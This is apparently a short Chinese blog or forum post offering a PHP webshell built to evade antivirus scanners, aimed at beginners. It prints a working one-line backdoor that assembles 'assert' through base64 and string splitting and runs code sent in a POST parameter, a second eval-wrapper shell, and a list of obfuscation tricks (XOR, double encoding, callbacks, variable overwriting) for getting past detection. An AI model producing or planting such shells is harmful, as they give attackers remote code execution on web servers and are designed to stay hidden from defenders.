php免杀以及一个免杀的小马分享
没什么技术含量,但是主要是学思路
推荐新手观看
小马
通过base64编码,然后拆分了函数关键字,通过变量的引用等,然后@不报错,eval不能拆分使用
<?php
$b=sert;
$c=base64_encode($b);
$d='as'.base64_decode($c);
@$d($_POST['1']);
?>
很简单,然后还有下面是升级版免杀思路
免杀思路
异或函数的一个字母
用双重加密来绕过
弱类型绕过
函数封装绕过
function test($a){eval($a);}test($_POST['x']);
其他函数的替换
replace等替换函数的使用
变量覆盖来绕过
函数回调绕过
最后后
也有加强版的,但是还是只分享思路,然后供大家学习,只做伸手党也不太好。